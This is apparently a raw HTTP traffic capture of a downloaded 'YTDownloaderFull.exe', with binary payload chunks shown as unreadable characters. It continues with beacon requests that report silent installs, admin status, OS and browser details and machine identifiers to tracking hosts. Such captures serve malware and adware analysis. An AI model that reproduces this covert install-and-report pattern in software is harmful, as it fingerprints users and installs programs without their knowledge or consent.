...$LS..y.9e1.m....k...]...`.eh.V...,.6i'....*h...62a.0.[....{.!..2.U.
.......r@......&@...]k.2..@.:..L.mKZy#9..u..]'..v..#..>..]....h..2.
.'c!...u.8....s..k.it....,......H.J...J..{.h...U.v.%...KA...Sd........
.6AeJ..).U.:.\.....F....~)...F.u.....)..(.|n.....Q.{n.W..Aj.i....V...4
.|..?[..o'..N.Z.M..R.D55.y@#E..rq&.X8._q...T....f........i.B-...v.-$..
rj.o..)Nd ............=...".h....]r..... ... .a..NAO.y6.hu....c..-..V.
...{8.9O.M..w....[...-.Z..;.'S..../#.R?.g,..V...6....o\[email protected]...\.
...BMc............9.s.O..c=<.fe.....7..... #*..V../E..."...j.......
C*..|\Q......a.em(Q.......|....#).f....G{h...-.)....h[..Nu.j.8yY.`.'..
..N..G.....gR.H?o......v...m:".qqQ..vI......`..vU...u.. '....P.<*G.
1y#u.u85:....&._...j.RN4..;"..W ....'.|...uD....A<.&....B{/.'. .'./
.-.Y.?...2.Y,..C..m... ......B.O..g].Pz....(.d.'w.0S.K...y.Ll..lO....P
.J..,2m.......k./w[..h.@.]..O:.:4....p..j...u.X...-...w.x.J.F...*.:$.9
.At...A..E{.s.....*l.d _...e..<.Be.T.\.m......K..].H8.z....02.b79..
..N.....Rz.gz....c2. .(.*.O..z...S.".C..!.`....kE).S..s...gf~L...O....
.....1..`..lX..8(r.....rN.).hw....QI`...../.)5#.~...[..d.Q..v)..jlY[Dj
..o...]d..y...>....Y..S..t`,...........6...|./:H..\=..u..t...9Q<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=5750000-5999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:06 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 5750000-5999999/7202374
..c..Z....D..>...k..l.....x.o..../.I.......m..a...{.*y...6..c.J.eTS
BJ.Q.....{Z.......NR...-9Z.......^...c.b.\SL.t..... @....<....?}y$t
Q....u..P....q..SZ..........#k6...Q. ..A..M.zE.^....b./.U^E..7.).k..~?
......>.J_qR. ..!..n.*...b..t?S.(M:..$.A...|....;...l.......*...W..
.%<Y..>.....N%..'b..C..E..=. ....?.b.. .]T....y....2.%.......;.t
.][email protected].~.z..b.. v... ..75qR6..Hv...O...Q.......J. .zL..
a.r..K....T..~.....=.TL.jV2..<K.9i........c..V2.".....bv.9.....C0..
......x....],x>\...z...]...}..9..=48.-..a.vW1._k...v......H....=..,
5H...)..T....F5#A.t..aK...^t..).UOa,yr..%$.k|>b....@.... .....1K.d.
.k\iz.O....@.|.......X...G.....C..M.In.G..Iw..Kz.b.'.o..6%..xTJ. .....
L..GOo..)...Dq})[email protected]@p.../...4.5^^.1d|
....A4...{oQ....]..5.^>gn'...U.i.r./z.<kG.u... .t.....vJY...:.1.
...[,.$..tDj.ma....w..r....}..g.f.I.7y.B>....|}}ns..K...f6¼z8yyIF
r....T.ce..J.......(8./..9..$.f.h.,.W.....".#.6.$...vh....)..<.J.b.
.SN.v...>My.>i...2.\{...w .......&....>..|..E-IC.j..)\.C2..,.
..y.D.y...w..2n.,s...%....<.j..j.$........L......SU<U..<iU..[
:.....4 ..J..%......h0Z...Q.....eg...s.2...N.|...,...*8F).[.....[..!/'
...=..Kt.....G.!^l........td.de*...;x...8.|.~AX{}b...i..W.C..f...<.
Ki.s5WPGw.GL...o...f ...!..azm..6..Dfo..H.%.o..k..Mj...E.l.....7UXO.Hq
[email protected]....*Y..jO..so.........].<.z....{oi"L.Pi....!....3..
M"}G*.jfQ9......HD.,......0...c....."f...@,......W........z%...)..V...
.........U.........),....T.r..c}..Y.....B..g....4_..K...p ....#...<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6000000-6249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6000000-6249999/7202374
......Uo./.._c..1..N...GB.=|.S.._.|.6....%..Zk>VZ.T..uH.kg.J... g..
.){.....tg.U..$...&..R.r..5/..A...#...n.t."'./v.5.E!.|.....>...Y[..
$i=..P...:T...T.....-...F.P.....5s............U..n..mt..{...D..>..O
.... .......r...@.......).......D.9......O...#....Lh'X....t..rWE..ls.S
......M%._p...o.......*.<...~}..:[."H.N....A...Pb/..g.....)*2f-.w*W
KO...9.~........log...4......v;.<..P..)%....i`N(..S....F=S..3W....F
*B.......U9...._!.&....:f.D.[..........C..&..1<Z......{.a..8.......
P...b... ..p-.4k.."..V.fmv....PW$..MA"h.$v...kl...[x.....M.......|....
.p...\...F.q  QLH.!...2......%..X-.6...2....kB......9.........l.....s.
]-f.....-............&]..H.".t....s~.~.~k..u..@D8`#&..AH..>i>.b.
..00...p,9).2{.tI.........A..ko.p...3F...E>5.e....3..q2....w.AA....
.%.)?^P0.[\........7..:.....W.iw........$......p...r....Pf..e....Z..F.
...0..(yT..n..&^..5A.h.d..E....t..H.*.-g..)Z.8.9.gO......!.M$.1..A..W.
.*.H... .{9...5.M..Hp....|..M....M..'g;G..m...4e..J'.R..M.c.Q.4.Nn..hm
..J.Q{....:....J.e...k|.. r..5.b. .Lr."...q".m.......1.C.7..i%.^..G...
.j7.......*.. ...................g*xBKe....=\X.....~..Y<....;e..
.w.\.aU.Gh.S..@.*....uq...X...5....>./.D...g.....]......4.(....(...
`.w.........G..r....h....W....ZN.....8"x..m*..D.=....:..i._5..i..y5[..
...e.9...2..3d~....Sx2.1.........4..%.4.....#t...n...{...0.'tm=..y....
Q...40&._A.=...a.........F...........g;.....6.*......P.B\<..D....&l
t;L...J......AX.W..(.....]..^.9XsT.N!.5.i!.._._.#.;';.ky...y...... ...
.H..^.Z}...0.1....-....=....7..#...2t.2.......n..2....sO.........K<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6250000-6499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6250000-6499999/7202374
.O .&.>u...X.)......j....`..|.......2...3..... z.r39q7..H.{..K.....
.L..Z3. z...{..l.S.....M.z#%..Li:8......u......d..-.... B^N.........B{
...N.i.._.D.....k.-.$L.i...W..U.xb...]..S.[f......p%.G.....i.....-$..L
-..{7....^.\..._......=.....K.y.../... ..;.L.[B.......D..:zD E...3....
...t.,.....{.r5Xe5om...t6..Zc.........o...HQ......B./.m.,.i$.I.0E.....
.qIt.."...5. J..v.8.4..*..o...*._.}U...^..$............(.S......A.v..]
..wR).."<2.gBG..Ux...]....|Lz2.\qD..s.$d..l.m&$s.......#....PP.._..
.".......$..7yo.H.=....!..q..E=.9f....S.....rSh......Pc0*.{........s.C
*..........p..5......S...HIp.yn9f.j.b.L.\f].l........L.G$..[V5I.....(.
..X...tx.y.I|[email protected]..,..".|.-"..lo.)I...~...o........
.....AQ.T.pWAa.".0...x........K.{.nm3...a...6=3w..".,0.F.O.)...,.)B.a.
......>.(.r.].Z..K.. B%.`r^..D....a...5.......E.*C..%...v....t.=6U.
...Z.......p.......H......I.a...mW....~...G .&....;[email protected].]....."....{
D8.4.g{....__.l|8....0.....'.Xl.....e....q....L.f.......}.G.2l...Q.._.
..m.=Z............@.......'h....[[email protected].....]..r.&s.P.0D....r>V
*I..K......L..b.A=....QW... R...w.^.z.d/...r.........S..x.b.-..?......
2..5...?...1/UK3N...W-.....5.I..z[..d......{hCb ....e.^.}Y..X...Gxl g.
....C..J......{> ..{1...........x.]..K...."c......>....]..6..z..
..x.......=../...B.,~^a....(.A{.7.H.4.....'c|^...M..LZt[.f.M.{c..l....
./....2v..u......:.;'O..1.joMb1.f....r.-E.U..|....'>...BC...3.3!...
3.J.....d..`.@.. .,....5I..us...P......G..B......L..j....."...|.x.4.:.
.rm..5.W9.a....eF.........Xv..........u.EB...#hj.8.j...F|.u...[...<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6500000-6749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6500000-6749999/7202374
..y.. .l..-#.@m...%`..`r\...IXI..)..[.`...1...s.....M......}&...1@5?..
.k[.hJ..d.U..W......%..l..TT....b.e/~e...!........j.?*.|.U....<....
..... {.. ...%v..LJ.u<}.......n.b[<[..x.xk.....'R.c.....|m..2.\.
..M. .$.x]......o.........)cF.x....TJ..9%A.................8.w%I...^.M
z.t.V.b...... ..$...a..........P.O.{Q}........>G.Okz....W.0@......$
.)O..._..DH.....1.A....T.................,ra..z.G@......._....h..c.R.1
u.....1,.pz./...i,[.1b..........'R0.....fX.gx.....x.<....v).3Zt...R
....;.Q.o.......I.M..uc.q.l...d..e.BU,x..X..T.....]=........l....^....
sBj._.. ...<..N..`....B..QE...]...)...... ....m.FN.>f.x5.. ...f.
.}.V. u^ek.............._.....Q.E.}...?.3../O.L.FE.8............/..~.B
.R...B.....Y.y....m...X..`@1.....u..3...`[email protected]....[*.g
S.,%..' ....Cn.BI.1k...3..H,....!..6..... .6#...GF..V.(Sbr..0...s{Y...
....K..X.p........E...K|...T....j.F.u..a...%........D.........s ...\..
..P...........s%*...w..O..bOSf.GOG.Y p.U.....z>v...H.B...f..,....r.
.FA.;......x..;..{.3...8..R..(dmF-8GB.o.NO].......Q0.......A..R..$....
.../qa....`.=,I...7qV?.X..1e2P.TLf.j%..L..v.%0..7...P....y'cG1Z..'R.J.
edI?h..2.h....qv.Yp[9$....Q4 A....6Y*2.9.O...<.Xy.k.,....%.(......,
..<.t.h.....T...h....C...[....*|.)..M...n....[.8.O'..kt.r...=....I.
`G......TcH%....<.....Ve..xQ.[4.l.....A..o...Qm.B.....F].wD.....wg.
...^.o...>......!.1...A.......Ys.....=....N..V....%/....o.z........
b.)....MFD...s....~..<...p.F..........W..|..>.u...D&.....b.....`
.....tL <..Y...1#c...?9o.K..!..C.-..'.. .Y..&.,...p.o...N..}...<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=6750000-6999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 6750000-6999999/7202374
.W(B`D.%...B{:.....z.b....T.g.I.w.O$.=.g..G..KR..9.&..Zo..`...o..*..{.
..7zs....sR)=EOv.....z...t.!!...8....z..} j(4...^.TCj ...).<.Re/i.D
...4.....O...H...l....F<.'....6...c...<.....5m..:....M..?.......
.*........%..6.0..[dK.3..e.......[..<q..].....^..]..Q.L....$......`
..........7..'.]....s.L...a.>..3)...2...q.Q..'V.[ ... =..*s..D.,H.8
`.!t)C......T...\As.k-.%...=.d.QQ$....N..9R.#..$...c_.........)_.g\...
.I...B..6....p"etCR1......ty"...N..[....>/..v7...@^6.....iof>t%.
..H.V*.f#....,J.....]..-.\....j.....kR...C...6..t......>.=...U.2.;Q
tK.......... K......q.s....d.2s.h/U^....\..t.#...w..................U,
.......-{..XH.QB.H.[!..........#`.......<qU.#Vd.c...n..s......B&.~.
......ZK....E.8.."..H..xQj)tjuVv..`>~e.. .e?...f......L.......h.4^.
{1c.._.....ml......[[email protected].}....#.^E(..C?...f:.j.
.Q..,..........%..'...{... ......S.....K..a..J..~.0M......c;......E.B.
..C.{S.....x...?........a..nWa~c`.p.Io..Vh0...Lc.ZZ.^.]\.`vZ..H.....l.
g........Y....;xZa....sv.]..k...(...*..}U...$.#r..^..C.....A.'[u.d.Po9
~.Z$A.D..q....r.7.;........\_v..c?....b?.O.... yT...w.h... Z.y.p..C...
}[email protected].{i.c..6...yR.s^......F..'.H....c.x..f..@
[email protected].....(y.{R.......M....6gq..IT.~.YG.kv..#..e.'.\`.. ...t.....k.,..
l.x...!....".m0......T.......<&vD~Yt{.u..]..J......y........vE..,B.
.Q..sav..I.H&8rc.I..|[email protected].{..~9x..f.Z..O....j.g..!.
h.".......Nt=.9...........%sU>..t...w3J.W........X1...~.0s...$.....
...G....X.......6.2h..k.uH...?Q..P....G...e..jn....\d.5..9..pu.[..<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=7000000-7202373

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Type: application/octet-stream

Content-Length: 202374

Connection: keep-alive

x-amz-id-2: wCGUF6sF0ZE8V41F8LdLpxiueKiva Eybmemw6dz7LWQDhiF45mEXL17MwRCuZ50

x-amz-request-id: C9E56CCB583C269B

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 7000000-7202373/7202374
|.M`.........Z<...U.U..X.K..k.l.c(....q.AT......R.O:.a.R...s.%!....
fh...G(%.........W.`%.>....:..i.|......f.Q34Z....1B.t.. ..z]H.m]wK.
.......l H....j>.l...,...-.I.z...OY....D-s.!OXu.OVy.. ....n'..f...0
...>..[.p.....l.w.b..h..n..O.......|...c.y=..>n.Y..yQs.xP.sWVv..
?X&".-..u.u...(n...>....N...<.L..Z.....".m. C;..;../.N......2V.0
~.fR..qo.....>..W...!..H........2.4U...W.~oD..."l..(..t.5.&..l....j
.1h.w.......\D".!"....D.Z.*...C.O.o.W..=..p. ^.=4 ....h.P..&....UXK%..
j7.O...|n.V.r._9.....g.&^.=.......\|.... ........|."..7 SO&....m..pV..
.y@....._....S..hO.../.-..(..2.q...'......SB)y..D....(.Zr#.S...-......
A..(....H2.........V.."........9...e.....E.S).;.J.....b...J]bj.u..}..i
$Q...{.p..h.7]..|....e......Ig.8.q.E.l.w.Q.g..U0.>;.<...........
F.{..,k.04H)3.2r.%.Mx._..?.G |[email protected]..# .o.zG.....n....s.|..R..
(6...*.dB/..ka....j)9U.{P3.m.ci....d......k.....&$...[v.5.z.|...X.d...
.\...=]..C...^AwC..=.1...\.gK..&.m....e.....I....$. ......fD..R.j.....
."j...,o."......<.."..(aY..OW....#...jR.M......[..}$...U-1Z......-.
kJ....nYVc..-.._.iH.O.h.h..`..k...=...........$..`..&.C/[email protected].
..B)..5T]..m.S.R.9h.x..X.I.y:..P..t...F...%.d5.....!..v].n.9|w....R...
! .r..B..Ym@k.>......c.".Bj.H...%...u.....FJ.Z.1Ob...: .....GX'.{FB
.......u..^.\.|78.m.c..2....ss.qk:.<1.Q..?Q.|.e....b../a..%.......u
.y.......ei....'<....E..G..c........y...(.&.tE.S.`@ak!.P..f..T.m#d.
.m..Sr.Z.N.m...9.bH.y.G.'..er.p.E...6..s=Y.l...T..*g...... .a>#....
h"-2.`......w|.w.$...`._.....Q..k=....a '.m....&o.H...Z.L9..:.\...<<< skipped >>>

GET /monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402673&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402673 HTTP/1.1

Host: logs.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:52 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1438402673.dop003.fr7.t,1438402672.cds021.fr7.c

GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 01 Aug 
2015 04:17:52 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 
Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
5..Content-Type: image/gif..X-HW: 1438402673.dop003.fr7.t,1438402672.c
ds021.fr7.c..GIF89a.............,...........D..;..

GET /installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402673&procruntime=7&rnd=1438402680 HTTP/1.1

Host: stats.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: U8ohDIcAYdlVckzLv07ehUBhdal kfdbvzSEabCX2tRnuyDGnlKMtW9NFzA4WaBt

x-amz-request-id: 28149CC588B82845

Date: Sat, 01 Aug 2015 04:17:54 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: U8ohDI
cAYdlVckzLv07ehUBhdal kfdbvzSEabCX2tRnuyDGnlKMtW9NFzA4WaBt..x-amz-requ
est-id: 28149CC588B82845..Date: Sat, 01 Aug 2015 04:17:54 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687 HTTP/1.1

Host: stats.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: aHCdkg/HjsRxK0nO58CKY8pe2MNXwTbCpLd56fFzOvaauBdPLxZEgaAlGcnBsp4y

x-amz-request-id: 5D39B52953468ACF

Date: Sat, 01 Aug 2015 04:18:00 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402673&lifetime=0&silent=1&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687 HTTP/1.1

Host: stats.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: oCeEaVPimvS0QBBu0dJajO8C74u19GWSej7qGjUUg53RENo6PhH/f3982xZeVpwf

x-amz-request-id: D4F636E3CA61B49C

Date: Sat, 01 Aug 2015 04:18:01 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 14:05:13 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: oCeEaV
PimvS0QBBu0dJajO8C74u19GWSej7qGjUUg53RENo6PhH/f3982xZeVpwf..x-amz-requ
est-id: D4F636E3CA61B49C..Date: Sat, 01 Aug 2015 04:18:01 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 14:05:13 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..

GET /installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402674&procruntime=6&rnd=1438402680 HTTP/1.1

Host: stats.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: igVGuOCz5jkp8sUwrFQMQMS3jUoYaSisgL1xZ5diiddpOC4/XaYDLAKUq/OgcX9kuWghiat2UjE=

x-amz-request-id: 6CA689AE1FEAEC0C

Date: Sat, 01 Aug 2015 04:17:54 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: igVGuO
Cz5jkp8sUwrFQMQMS3jUoYaSisgL1xZ5diiddpOC4/XaYDLAKUq/OgcX9kuWghiat2UjE=
..x-amz-request-id: 6CA689AE1FEAEC0C..Date: Sat, 01 Aug 2015 04:17:54 
GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, 
must-revalidate..Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT..ETag: "
28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;
....


GET /installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687 HTTP/1.1

Host: stats.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: udIVcVnz5ItAz5GV7iADJVboSMecCIH/XtKIvLZmPNvwHrPy vEfQHaJx7TvXzr3aw/1 FfVNAg=

x-amz-request-id: 0CAD8DF3EF7245E5

Date: Sat, 01 Aug 2015 04:18:00 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 14:05:17 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


